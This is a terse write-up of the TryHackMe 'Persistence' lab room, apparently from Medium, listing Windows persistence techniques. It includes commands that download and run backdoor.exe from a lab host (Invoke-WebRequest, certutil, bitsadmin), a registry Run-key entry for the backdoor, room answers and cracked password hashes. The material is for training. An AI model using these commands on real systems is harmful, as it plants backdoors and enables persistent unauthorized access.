Persistence TryHackme Writeup

https://tryhackme.com/room/persistence

What is persistence?

Low privileged user persistence

Privileged user persistence

Keeping persistence

Task 2. Low privilege user persistence

File Transfer method-1

File Transfer method-2

Invoke-WebRequest http://10.x.x.x/backdoor.exe -Outfile backdoor.exe

File Transfer method-3

certutil -urlcache -split -f http://10.x.x.x/backdoor.exe

Startup folder persistence

Editing registries

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\tryhackme\AppData\Roaming\backdoor.exe"

BITS Jobs

bitsadmin /create backdoor
bitsadmin /addfile backdoor "http://10.2.12.26/backdoor.exe" "C:\Users\tryhackme\Documents\backdoor.exe"
bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c bitsadmin.exe /complete backdoor | start /B C:\Users\tryhackme\Documents\backdoor.exe"

Answer: temporary

What is hash dumping?

878d8014606cda29677a44efa1353fc7
https://crackstation.net/

Answer: secret

e0b6050c7280bf4a7bee599cf374fd80

Answer: mypass123

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store